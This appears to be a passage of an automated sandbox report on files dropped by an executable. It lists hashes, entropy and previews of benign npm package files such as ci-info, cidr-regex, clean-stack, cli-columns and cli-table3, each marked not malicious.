              SHA1:306147110A81E4D70B7952DEDF1E7F2721B72866
              SHA-256:992625B053FB5EE02D4241F6D92EF19CF362EB0D880257EBAF921876F9814D3C
              SHA-512:8DD5020D7F37E803CC84BBD500BECD1515A88690254C23494343D9F71AA53FEAB1A42C631B93876FB0816EE7AA1CB3499A3DC9927F8FB6F01253D56DF333B647
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const vendors = require('./vendors.json')..const env = process.env..// Used for testing only.Object.defineProperty(exports, '_vendors', {. value: vendors.map(function (v) {. return v.constant. }).})..exports.name = null.exports.isPR = null..vendors.forEach(function (vendor) {. const envs = Array.isArray(vendor.env) ? vendor.env : [vendor.env]. const isCI = envs.every(function (obj) {. return checkEnv(obj). }).. exports[vendor.constant] = isCI.. if (!isCI) {. return. }.. exports.name = vendor.name.. switch (typeof vendor.pr) {. case 'string':. // "pr": "CIRRUS_PR". exports.isPR = !!env[vendor.pr]. break. case 'object':. if ('env' in vendor.pr) {. // "pr": { "env": "BUILDKITE_PULL_REQUEST", "ne": "false" }. exports.isPR = vendor.pr.env in env && env[vendor.pr.env] !== vendor.pr.ne. } else if ('any' in vendor.pr) {. // "pr": { "any": ["ghprbPullId", "CHANGE_ID"] }. exports.isPR = vendor.pr.any.some
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1023
              Entropy (8bit):4.735242202243651
              Encrypted:false
              SSDEEP:
              MD5:D810AACC802ADC34BA7202F36AD9D8A3
              SHA1:F786741E081A80C1D804BE7E4151957E83231F8B
              SHA-256:9628944ADD57307E56929181423E29814B52DABB36FD5A693784F8AA0A00ADD9
              SHA-512:6A6ED89F90912CD527AC1D0DC897D83825C8C9C442593B4E1F0F2721DF270DB96497B4CD6F1BCCB2202BEBE58807893A00BBA9731D122EF206B6AB040EF99588
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "ci-info",. "version": "3.9.0",. "description": "Get details about the current Continuous Integration environment",. "main": "index.js",. "typings": "index.d.ts",. "author": "Thomas Watson Steen <w@tson.dk> (https://twitter.com/wa7son)",. "license": "MIT",. "repository": "https://github.com/watson/ci-info.git",. "bugs": "https://github.com/watson/ci-info/issues",. "homepage": "https://github.com/watson/ci-info",. "keywords": [. "ci",. "continuous",. "integration",. "test",. "detect". ],. "files": [. "vendors.json",. "index.js",. "index.d.ts",. "CHANGELOG.md". ],. "funding": [. {. "type": "github",. "url": "https://github.com/sponsors/sibiraj-s". }. ],. "scripts": {. "lint:fix": "standard --fix",. "test": "standard && node test.js",. "prepare": "husky install". },. "devDependencies": {. "clear-module": "^4.1.2",. "husky": "^8.0.3",. "standard": "^17.1.0",. "tape": "^5.7.0". },. "engines": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):5720
              Entropy (8bit):4.558311572043402
              Encrypted:false
              SSDEEP:
              MD5:0E157604A2415657E1C3E4DCC00CD8CC
              SHA1:1ABDBC75DBAC7971C3A5D62F66A322AB0E4E63DE
              SHA-256:81281D54DC7289467C3E1FAE1EFF3655029487F642AB2B74340A65FEED05DD66
              SHA-512:88DDAD25ACC6500AB7DCE88583B1B927E39E829E55B6B2A7FA2FDAE45ADCFDD27A5F3583D01C98DA72702EE263ACE5713815556D786B715D6DA5A26DB00F95E1
              Malicious:false
              Reputation:unknown
              Preview:[. {. "name": "Appcircle",. "constant": "APPCIRCLE",. "env": "AC_APPCIRCLE". },. {. "name": "AppVeyor",. "constant": "APPVEYOR",. "env": "APPVEYOR",. "pr": "APPVEYOR_PULL_REQUEST_NUMBER". },. {. "name": "AWS CodeBuild",. "constant": "CODEBUILD",. "env": "CODEBUILD_BUILD_ARN". },. {. "name": "Azure Pipelines",. "constant": "AZURE_PIPELINES",. "env": "TF_BUILD",. "pr": {. "BUILD_REASON": "PullRequest". }. },. {. "name": "Bamboo",. "constant": "BAMBOO",. "env": "bamboo_planKey". },. {. "name": "Bitbucket Pipelines",. "constant": "BITBUCKET",. "env": "BITBUCKET_COMMIT",. "pr": "BITBUCKET_PR_ID". },. {. "name": "Bitrise",. "constant": "BITRISE",. "env": "BITRISE_IO",. "pr": "BITRISE_PULL_REQUEST". },. {. "name": "Buddy",. "constant": "BUDDY",. "env": "BUDDY_WORKSPACE_ID",. "pr": "BUDDY_EXECUTION_PULL_REQUEST_ID". },. {. "name": "Buildkite",. "constant": "BUILDKITE",. "env
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):830
              Entropy (8bit):5.238199075989886
              Encrypted:false
              SSDEEP:
              MD5:94C659A227D95C8B87EFF48B90ED7940
              SHA1:1F4A8EF7E2F25AAAC3617043CCD1B6225ED58EBB
              SHA-256:C721534A68C11E3FECABFACF3B7C5C23A5CF496F91D01CD160646F3888A89A79
              SHA-512:505A89069F74F56FF5D8BA9A368704A862581A35DE6C83B146398EA31AB568FF89BDABD1A330330420D72F4D23EFB4E7852CA29D3AFC480C888B77332DAD5325
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..const ipRegex = require("ip-regex");..const defaultOpts = {exact: false};..const v4str = `${ipRegex.v4().source}\\/(3[0-2]|[12]?[0-9])`;.const v6str = `${ipRegex.v6().source}\\/(12[0-8]|1[01][0-9]|[1-9]?[0-9])`;..// can not precompile the non-exact regexes because global flag makes the regex object stateful.// which would require the user to reset .lastIndex on subsequent calls.const v4exact = new RegExp(`^${v4str}$`);.const v6exact = new RegExp(`^${v6str}$`);.const v46exact = new RegExp(`(?:^${v4str}$)|(?:^${v6str}$)`);..module.exports = ({exact} = defaultOpts) => exact ? v46exact : new RegExp(`(?:${v4str})|(?:${v6str})`, "g");.module.exports.v4 = ({exact} = defaultOpts) => exact ? v4exact : new RegExp(v4str, "g");.module.exports.v6 = ({exact} = defaultOpts) => exact ? v6exact : new RegExp(v6str, "g");.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):843
              Entropy (8bit):4.642597194550451
              Encrypted:false
              SSDEEP:
              MD5:16E12CE733F07C2C7476A50489B7604A
              SHA1:A2D15050978A7B7152F375947C1608619ADE8293
              SHA-256:2E4CA17DADF5040B598E381C6BEEF7F860AC671957A8E665425306EF793CEF69
              SHA-512:074D975E2AA26119284703F5EB43CD2229B4C5A6BE8978A0E11F12F5599C2F6D3C91E3824BC3F45AC435CD0E1E5B0C10C22872E4A968C6EF57CB789DC8CBA0C6
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cidr-regex",. "version": "3.1.1",. "description": "Regular expression for matching IP addresses in CIDR notation",. "author": "silverwind <me@silverwind.io>",. "contributors": [. "Felipe Apostol <flipjs.io@gmail.com> (http://flipjs.io/)". ],. "repository": "silverwind/cidr-regex",. "license": "BSD-2-Clause",. "scripts": {. "test": "make test". },. "engines": {. "node": ">=10". },. "files": [. "index.js",. "index.d.ts". ],. "keywords": [. "cidr",. "regex",. "notation",. "cidr notation",. "prefix",. "prefixes",. "ip",. "ip address". ],. "dependencies": {. "ip-regex": "^4.1.0". },. "devDependencies": {. "eslint": "7.8.1",. "eslint-config-silverwind": "18.0.8",. "jest": "26.4.2",. "tsd": "0.13.1",. "updates": "10.3.6",. "versions": "8.4.3". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1055
              Entropy (8bit):5.128687685115816
              Encrypted:false
              SSDEEP:
              MD5:B72DC7F8AADBE2686AFAD531D6F4CBAD
              SHA1:F6D047626B5DF7A695A0E555F2BA8C78D5E9CDCF
              SHA-256:E813CF7271DF893727BA03028926B2B6C2B45E3357DC99D0688A0074A62F4CEE
              SHA-512:9D462D474415CAA93782564646A2205EE82DBDA85F35627C7341B09275BEAA73F6166608C1A322E4D07384E66CEFA136233FAAAD31AB2D4643E15D75A3B4D786
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.const os = require('os');..const extractPathRegex = /\s+at.*(?:\(|\s)(.*)\)?/;.const pathRegex = /^(?:(?:(?:node|(?:internal\/[\w/]*|.*node_modules\/(?:babel-polyfill|pirates)\/.*)?\w+)\.js:\d+:\d+)|native)/;.const homeDir = typeof os.homedir === 'undefined' ? '' : os.homedir();..module.exports = (stack, options) => {..options = Object.assign({pretty: false}, options);...return stack.replace(/\\/g, '/')....split('\n')....filter(line => {....const pathMatches = line.match(extractPathRegex);....if (pathMatches === null || !pathMatches[1]) {.....return true;....}.....const match = pathMatches[1];.....// Electron....if (.....match.includes('.app/Contents/Resources/electron.asar') ||.....match.includes('.app/Contents/Resources/default_app.asar')....) {.....return false;....}.....return !pathRegex.test(match);...})....filter(line => line.trim() !== '')....map(line => {....if (options.pretty) {.....return line.replace(extractPathRegex, (m, p1) => m.replace(p1, p1.replace(homeDir
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):603
              Entropy (8bit):4.716558453844331
              Encrypted:false
              SSDEEP:
              MD5:4FE8F5960E0AE878DDE333676027EC3C
              SHA1:4783E06A89EE21C7109F053235B03211EC87F5AF
              SHA-256:9B4A4A5CC61A09E61AA1CE84BC68C84AEF90ABF9A0280D09214A89189257CA7A
              SHA-512:23E5A449824ACB468572C31EDEF8BDCDD7BD677C3B57EEA94DA5D5D8F334A0794B6459D0AF0A54F58E8D10F24B2BC021BD3BB2622F058527DDC858FC24751EAC
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "clean-stack",.."version": "2.2.0",.."description": "Clean up error stack traces",.."license": "MIT",.."repository": "sindresorhus/clean-stack",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=6"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."clean",..."stack",..."trace",..."traces",..."error",..."err",..."electron"..],.."devDependencies": {..."ava": "^1.4.1",..."tsd": "^0.7.2",..."xo": "^0.24.0"..},.."browser": {..."os": false..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):403
              Entropy (8bit):5.156227737960295
              Encrypted:false
              SSDEEP:
              MD5:AE5E58AD02E94014E49B0EA3F9A21484
              SHA1:3A9812B96CFE862A8154B680D8A32FA909C9C764
              SHA-256:835431AB4564F5C69ED35A95A2E8B5098E7440F75D553EA33E1444D42E66D682
              SHA-512:F25B0C39F5606992BB02AA8D6686005BD96622E8D47E9B912930AECD0A1EC3090ECEAB4E46FE715A714FBCDD8966FFC6D57A82A48E873B61A0A6CFC35CC7B67A
              Malicious:false
              Reputation:unknown
              Preview:const chalk = require('chalk');.const columns = require('.');..// prettier-ignore.const values = [..'blue' + chalk.bgBlue('berry'),..'...' + chalk.yellow('...'),..chalk.red('apple'), 'pomegranate',..'durian', chalk.green('star fruit'),..'......', 'apricot', 'banana',..'pineapple', chalk.bgRed.yellow('orange').];..console.log('');.console.log(columns(values));.console.log('');.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1627
              Entropy (8bit):5.015207041797018
              Encrypted:false
              SSDEEP:
              MD5:D5EC4209882F10E04C7C649A0173EAC0
              SHA1:82FACCC37239BC2778392C9F3CC6385810608BF2
              SHA-256:BF594AE91BFC80DE4B489E80B35563E622DC4C9DDECF5E047067B03CC5D4D174
              SHA-512:68EA76F41A9FD1387367C350D986D778F2C68CC393872A803C1470550F14A2377BEE871117021681667146557C3F8CA4320E7EF0ABF64792A5DFBED00DF1CABF
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const stringWidth = require('string-width');.const stripAnsi = require('strip-ansi');..const concat = Array.prototype.concat;.const defaults = {..character: ' ',..newline: '\n',..padding: 2,..sort: true,..width: 0,.};..function byPlainText(a, b) {..const plainA = stripAnsi(a);..const plainB = stripAnsi(b);...if (plainA === plainB) {...return 0;..}...if (plainA > plainB) {...return 1;..}...return -1;.}..function makeArray() {..return [];.}..function makeList(count) {..return Array.apply(null, Array(count));.}..function padCell(fullWidth, character, value) {..const valueWidth = stringWidth(value);..const filler = makeList(fullWidth - valueWidth + 1);...return value + filler.join(character);.}..function toRows(rows, cell, i) {..rows[i % rows.length].push(cell);...return rows;.}..function toString(arr) {..return arr.join('');.}..function columns(values, options) {..values = concat.apply([], values);..options = Object.assign({}, defaults, options);...let cells = values.filter
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1122
              Entropy (8bit):5.10256445490758
              Encrypted:false
              SSDEEP:
              MD5:01510FC972DCA0E71A6BDA3B07194824
              SHA1:964B87FA5ED104FF9DD13BF3EF32F552EB4E5F1B
              SHA-256:B4C8D681302B783F22B980A224DA87E6074A2517B11F53219DC392F23C5A2A46
              SHA-512:9BFCBFC83DA65C669F826BD8FBAB52718B08CBF88BC4CCB3407F61A90A1049E8BA4082F4A31D272A7E8226C00B66334D2DFB0D9779F117A31C700D8072187490
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) Shannon Moeller <me@shannonmoeller.com> (shannonmoeller.com)..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1054
              Entropy (8bit):4.573352455892314
              Encrypted:false
              SSDEEP:
              MD5:D814899EEFBE8A5D4CBF6FB8544F3888
              SHA1:06C7CE3D82BA512EAFA34BAB2566BCCE77D4BEB9
              SHA-256:891744A36ECF1B807B47550F752193FAB79289340FD6FB8CA79E0E8CA77A3843
              SHA-512:91F3B9EEEBEE3D6AD3C693B28D446C3B5E65DACD75BE96C38ED45A97A6F6770031C0F303FDCBC6968354C9FB599228553A0A5024456F221F2B830CBFE1FD27B0
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cli-columns",. "version": "4.0.0",. "description": "Columnated lists for the CLI.",. "scripts": {. "lint": "npx eslint --fix '*.js' && npx prettier --write '*.js'",. "test": "node test.js && node color.js". },. "keywords": [. "ansi",. "cli",. "column",. "columnate",. "columns",. "grid",. "list",. "log",. "ls",. "row",. "rows",. "unicode",. "unix". ],. "author": "Shannon Moeller <me@shannonmoeller> (http://shannonmoeller.com)",. "homepage": "https://github.com/shannonmoeller/cli-columns#readme",. "repository": "shannonmoeller/cli-columns",. "license": "MIT",. "main": "index.js",. "files": [. "*.js". ],. "dependencies": {. "string-width": "^4.2.3",. "strip-ansi": "^6.0.1". },. "devDependencies": {. "chalk": "^4.1.2". },. "engines": {. "node": ">= 10". },. "eslintConfig": {. "extends": "eslint:recommended",. "env": {. "node": true. },. "parserOptions": {. "ecmaVersion": 8.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):2208
              Entropy (8bit):4.919424089511717
              Encrypted:false
              SSDEEP:
              MD5:1A30A874D7BBAE7EA24FA238160077E7
              SHA1:9BD852905A41F72DFB6C67AA3EAC3E525C5FD490
              SHA-256:CE9BE2E494DEEEADD90DFB74FA0E726E9E9D43652B29CD9498793F5962843FBE
              SHA-512:812C684C07BBA4BA39C6E3E39F81834C5ACE3DB96806082FE1E2BC4476F49D162799C90C0CA4E3F71B45F37BB5339174A067720341B4BCF6E4265BE8F2D1A169
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..const assert = require('assert');.const chalk = require('chalk');.const stripAnsi = require('strip-ansi');.const columns = require('./index.js');.const tests = [];..function test(msg, fn) {..tests.push([msg, fn]);.}..process.nextTick(async function run() {..for (const [msg, fn] of tests) {...try {....await fn(assert);....console.log(`pass - ${msg}`);...} catch (error) {....console.error(`fail - ${msg}`, error);....process.exit(1);...}..}.});..// prettier-ignore.test('should print one column list', t => {..const cols = columns(['foo', ['bar', 'baz'], ['bar', 'qux']], {...width: 1..});...const expected =...'bar\n' +...'bar\n' +...'baz\n' +...'foo\n' +...'qux';...t.equal(cols, expected);.});..// prettier-ignore.test('should print three column list', t => {..const cols = columns(['foo', ['bar', 'baz'], ['bat', 'qux']], {...width: 16..});...const expected =...'bar baz qux \n' +...'bat foo ';...t.equal(cols, expected);.});..// prettier-ignore.test('should print complex li
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1102
              Entropy (8bit):5.137293024091038
              Encrypted:false
              SSDEEP:
              MD5:EDD644ABC2B3CFC24845957CB7424B35
              SHA1:B4676F230F4EEAD0C6F2CC6F00B0D03296B3B6BD
              SHA-256:BEB6B55BC79E0660B9FD8424C2F65C966991E1A866C23356C1427E146C6CDDEA
              SHA-512:F5C47E191CF6E731A5CF70B1DDB25889BD35D4822AC56234D33DA8D5B6D3AA0CCA92DD4965181A4FFF5F062B83FAF5FDF9626A223D9BEFD922DF4F43A619DB0F
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) 2014 James Talmage <james.talmage@jrtechnical.com>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):40
              Entropy (8bit):4.381687083026441
              Encrypted:false
              SSDEEP:
              MD5:4D6C72B84F5D74832A4A4BBBCFF5BF83
              SHA1:5A97DDE82697EC9EC45B2383CF6C17C3CE6ABEA3
              SHA-256:0FE175D9ABEBF8107D8010CA639651BE92305CAF276E9F4E92089D8F30D6E74C
              SHA-512:95C94742DE2901225DFDFEE0AFF149C72DFD7AC193334384C7D787577E14B75842A5132759BABF333E9C12012FBE76BDE2CD5BA19703A210EC2D0071CA1E9469
              Malicious:false
              Reputation:unknown
              Preview:module.exports = require('./src/table');
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2295
              Entropy (8bit):4.5965055316074395
              Encrypted:false
              SSDEEP:
              MD5:1AD1737580EBC38D46E4457E14569961
              SHA1:34BC67DEFE25DC09FA5A0C320F62997132EE670F
              SHA-256:CC1482AFEF4687C00713C8B984A6ECCDCC7AFAD79811ED0CE585EFA1CB998B38
              SHA-512:17A91A9FD492D16113185CCEC62238EA21DDC5CAECEE1F764C3CEC58E861B4A69E2CD185CC22166B6A35717ECE3E328E8AE5480713B6D20A78CE274D70804B84
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cli-table3",. "version": "0.6.3",. "description": "Pretty unicode tables for the command line. Based on the original cli-table.",. "main": "index.js",. "types": "index.d.ts",. "files": [. "src/",. "index.d.ts",. "index.js". ],. "directories": {. "test": "test". },. "dependencies": {. "string-width": "^4.2.0". },. "devDependencies": {. "cli-table": "^0.3.1",. "eslint": "^6.0.0",. "eslint-config-prettier": "^6.0.0",. "eslint-plugin-prettier": "^3.0.0",. "jest": "^25.2.4",. "jest-runner-eslint": "^0.7.0",. "lerna-changelog": "^1.0.1",. "prettier": "2.3.2". },. "optionalDependencies": {. "@colors/colors": "1.5.0". },. "scripts": {. "changelog": "lerna-changelog",. "docs": "node ./scripts/update-docs.js",. "prettier": "prettier --write '{examples,lib,scripts,src,test}/**/*.js'",. "test": "jest --color",. "test:watch": "jest --color --watchAll --notify". },. "repository": {. "type": "git",. "url": "h
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):13648
              Entropy (8bit):4.793349401328991
              Encrypted:false
              SSDEEP:
              MD5:62272FFA2B465172F3089DEDD9277BC2
              SHA1:457F1E6FE279E7A8E9DDA97665E6587B8262D0CC
              SHA-256:7D1B587AC1F7B38518AD8E06B773D8CA910B3D3234DBF6FC810055F0306C98CB
              SHA-512:E757A6ADE963AA591E25554BFA0FC2DA0F42066612B464186D323626D6ADEA6636195323CFB44E4189EC81ED481DEA1E4D0F8B32A2592AA7D158CF2488150618
              Malicious:false
              Reputation:unknown
              Preview:const { info, debug } = require('./debug');.const utils = require('./utils');..class Cell {. /**. * A representation of a cell within the table.. * Implementations must have `init` and `draw` methods,. * as well as `colSpan`, `rowSpan`, `desiredHeight` and `desiredWidth` properties.. * @param options. * @constructor. */. constructor(options) {. this.setOptions(options);.. /**. * Each cell will have it's `x` and `y` values set by the `layout-manager` prior to. * `init` being called;. * @type {Number}. */. this.x = null;. this.y = null;. }.. setOptions(options) {. if (['boolean', 'number', 'string'].indexOf(typeof options) !== -1) {. options = { content: '' + options };. }. options = options || {};. this.options = options;. let content = options.content;. if (['boolean', 'number', 'string'].indexOf(typeof content) !== -1) {. this.content = String(content);. } else if (!content) {. this.content = this.options.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):464
              Entropy (8bit):4.704795132271435
              Encrypted:false
              SSDEEP:
              MD5:54E555A9E7EE4E59B9BCD28C57C3EDD4
              SHA1:E64318E7C7498FE6C22F71DCD1302B8292A419BD
              SHA-256:C6A9EA3794F3BB5F30C99559CA566944FAE3E4883ABC0000C420F24C7198925D
              SHA-512:6C9DD1C3E8061D75DE130E2F4B36E3E050BAA56AA7B1815FBBFE9E8266D8ABAB12A0D2BE73630ED093FA5579F0FF11D470E506A215179A0B0242C3FF2495B0DA
              Malicious:false
              Reputation:unknown
              Preview:let messages = [];.let level = 0;..const debug = (msg, min) => {. if (level >= min) {. messages.push(msg);. }.};..debug.WARN = 1;.debug.INFO = 2;.debug.DEBUG = 3;..debug.reset = () => {. messages = [];.};..debug.setDebugLevel = (v) => {. level = v;.};..debug.warn = (msg) => debug(msg, debug.WARN);.debug.info = (msg) => debug(msg, debug.INFO);.debug.debug = (msg) => debug(msg, debug.DEBUG);..debug.debugMessages = () => messages;..module.exports = debug;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7053
              Entropy (8bit):4.57457048370729
              Encrypted:false
              SSDEEP:
              MD5:BAA13E4282281041CD903AC9F2C40CBC
              SHA1:A3556133877514B8BB51B6A434BF9DFEC93877B8
              SHA-256:C9A63BAEF65A6FF9668698F5DF169D960E9977C6290951942E2D79F0561998E5
              SHA-512:448C6769E2E14A542BFE4963A66992D7D669309A3E14466042C405A69F643111017111570A1C85FA92A87FB2783A7AD76B2F4AABAB334AEB7B77247CCFF26C43
              Malicious:false
              Reputation:unknown
              Preview:const { warn, debug } = require('./debug');.const Cell = require('./cell');.const { ColSpanCell, RowSpanCell } = Cell;..(function () {. function next(alloc, col) {. if (alloc[col] > 0) {. return next(alloc, col + 1);. }. return col;. }.. function layoutTable(table) {. let alloc = {};. table.forEach(function (row, rowIndex) {. let col = 0;. row.forEach(function (cell) {. cell.y = rowIndex;. // Avoid erroneous call to next() on first row. cell.x = rowIndex ? next(alloc, col) : col;. const rowSpan = cell.rowSpan || 1;. const colSpan = cell.colSpan || 1;. if (rowSpan > 1) {. for (let cs = 0; cs < colSpan; cs++) {. alloc[cell.x + cs] = rowSpan;. }. }. col = cell.x + colSpan;. });. Object.keys(alloc).forEach((idx) => {. alloc[idx]--;. if (alloc[idx] < 1) delete alloc[idx];. });. });. }.. function maxWidth(table) {. let mw = 0;. table.fo
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2673
              Entropy (8bit):4.673756319699165
              Encrypted:false
              SSDEEP:
              MD5:5FD222CF3A438EB30B5B5238CA43DAC4
              SHA1:E1FFCCB89F3F4A8032D87AB10C439D5ED6F1B14D
              SHA-256:B2B149140C9BC9982E6894EA36AD54FD595DE3459AF98B064C26C7C78F57A36B
              SHA-512:671A9276558C97F7777FDD923D11BF026C72A88FB905279FE7BBC8FDE2F6E68F7FFA3B6A306C3875AC35E29BD1B88E5189F903032B6231A7C9DCC54E1ECA8BC1
              Malicious:false
              Reputation:unknown
              Preview:const debug = require('./debug');.const utils = require('./utils');.const tableLayout = require('./layout-manager');..class Table extends Array {. constructor(opts) {. super();.. const options = utils.mergeOptions(opts);. Object.defineProperty(this, 'options', {. value: options,. enumerable: options.debug,. });.. if (options.debug) {. switch (typeof options.debug) {. case 'boolean':. debug.setDebugLevel(debug.WARN);. break;. case 'number':. debug.setDebugLevel(options.debug);. break;. case 'string':. debug.setDebugLevel(parseInt(options.debug, 10));. break;. default:. debug.setDebugLevel(debug.WARN);. debug.warn(`Debug option is expected to be boolean, number, or string. Received a ${typeof options.debug}`);. }. Object.defineProperty(this, 'messages', {. get() {. return debug.debugMessages();. },. });. }. }.. toStr
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):8159
              Entropy (8bit):4.901474952817885
              Encrypted:false
              SSDEEP:
              MD5:A24C767CDF3BEA31369951A9918D6B17
              SHA1:B46CBFFA47C4880C03C00080552ABED2939F8F02
              SHA-256:FC08B55C9474CD55BEDF75EF42BC5FD2E8E0523C078FD40ED32BB2A857C955D0
              SHA-512:AB7F34323C52A36D2D7CA47F54851D11F6B2259B43D0DFCCEBED9A9E65757C7E7F5780C994D03878AF84E7DC053121243E42978FDF0FCEFBCA6E56D92DAAC2D8
              Malicious:false
              Reputation:unknown
              Preview:const stringWidth = require('string-width');..function codeRegex(capture) {. return capture ? /\u001b\[((?:\d*;){0,5}\d*)m/g : /\u001b\[(?:\d*;){0,5}\d*m/g;.}..function strlen(str) {. let code = codeRegex();. let stripped = ('' + str).replace(code, '');. let split = stripped.split('\n');. return split.reduce(function (memo, s) {. return stringWidth(s) > memo ? stringWidth(s) : memo;. }, 0);.}..function repeat(str, times) {. return Array(times + 1).join(str);.}..function pad(str, len, pad, dir) {. let length = strlen(str);. if (len + 1 >= length) {. let padlen = len - length;. switch (dir) {. case 'right': {. str = repeat(pad, padlen) + str;. break;. }. case 'center': {. let right = Math.ceil(padlen / 2);. let left = padlen - right;. str = repeat(pad, left) + str + repeat(pad, right);. break;. }. default: {. str = str + repeat(pad, padlen);. break;. }. }. }. return str;.}..let co
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):1070
              Entropy (8bit):5.187391134914497
              Encrypted:false
              SSDEEP:
              MD5:411E33109FA516D190D232100FDC7F8E
              SHA1:AB8D07F122B88E61E3C3596D78FE4A41EE3C2E13
              SHA-256:3FB0857EF0133928CF72C88DFC464E931486E88778961EEDEC25585E2321507F
              SHA-512:920F935D5E6BF5780C8FA76776A814B6AC8DE407B5C3F36E3E757BE2BC72057378366F1FC93FDF749EB76A2460879C5A10F59E82737C779A357A41C93B70A83C
              Malicious:false
              Reputation:unknown
              Preview:Copyright . 2011-2015 Paul Vorbach <paul@vorba.ch>..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the .Software.), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED .AS IS., WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, OUT OF OR IN CONNE
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):411
              Entropy (8bit):4.938062988772829
              Encrypted:false
              SSDEEP:
              MD5:A913920BFDCA2527B83EBDA489F5CE9A
              SHA1:422985D148426181991EBC43708F79C1CFD82D61
              SHA-256:2FDB46BF1B76EE0ECE04FD567E05ED6A32EDA74C2A11F877481DA9D5293F35C8
